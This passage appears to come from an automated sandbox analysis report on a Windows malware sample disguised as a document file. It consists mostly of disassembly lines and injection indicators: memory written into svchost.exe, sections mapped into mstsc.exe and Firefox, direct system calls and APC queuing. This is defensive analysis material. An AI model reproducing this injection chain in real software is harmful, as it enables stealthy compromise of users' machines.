            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEB50 mov eax, dword ptr fs:[00000030h]1_2_033DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FAB40 mov eax, dword ptr fs:[00000030h]1_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D8B42 mov eax, dword ptr fs:[00000030h]1_2_033D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EBFC mov eax, dword ptr fs:[00000030h]1_2_0335EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCBF0 mov eax, dword ptr fs:[00000030h]1_2_033BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEBD0 mov eax, dword ptr fs:[00000030h]1_2_033DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA24 mov eax, dword ptr fs:[00000030h]1_2_0336CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EA2E mov eax, dword ptr fs:[00000030h]1_2_0335EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCA11 mov eax, dword ptr fs:[00000030h]1_2_033BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEA60 mov eax, dword ptr fs:[00000030h]1_2_033DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386AA4 mov eax, dword ptr fs:[00000030h]1_2_03386AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368A90 mov edx, dword ptr fs:[00000030h]1_2_03368A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404A80 mov eax, dword ptr fs:[00000030h]1_2_03404A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330AD0 mov eax, dword ptr fs:[00000030h]1_2_03330AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B892A mov eax, dword ptr fs:[00000030h]1_2_033B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C892B mov eax, dword ptr fs:[00000030h]1_2_033C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC912 mov eax, dword ptr fs:[00000030h]1_2_033BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]1_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]1_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]1_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]1_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]1_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]1_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC97C mov eax, dword ptr fs:[00000030h]1_2_033BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]1_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov edx, dword ptr fs:[00000030h]1_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]1_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0946 mov eax, dword ptr fs:[00000030h]1_2_033B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov esi, dword ptr fs:[00000030h]1_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]1_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]1_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]1_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]1_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]1_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]1_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033C69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03352835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033BC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033C6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03360854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03334859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03342840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034008C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033BC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03330887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033FA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0335E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0335EF28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0073A937 GetProcessHeap
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00738E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00738E19 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe | Thread register set: target process: 7156
Source: C:\Windows\SysWOW64\mstsc.exe | Thread APC queued: target process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2872008
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0074BE95 LogonUserW
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0071374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00754B52 SendInput,keybd_event
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00757DD5 mouse_event
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DOC092024-0431202229487.exe"
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0074B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0074BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: DOC092024-0431202229487.exe, NZuQxWwOkTbZ.exe, 00000002.00000002.4144250712.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000000.1708479515.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1854910937.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: NZuQxWwOkTbZ.exe, 00000002.00000002.4144250712.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000000.1708479515.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1854910937.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: DOC092024-0431202229487.exe, 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: NZuQxWwOkTbZ.exe, 00000002.00000002.4144250712.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000000.1708479515.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1854910937.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
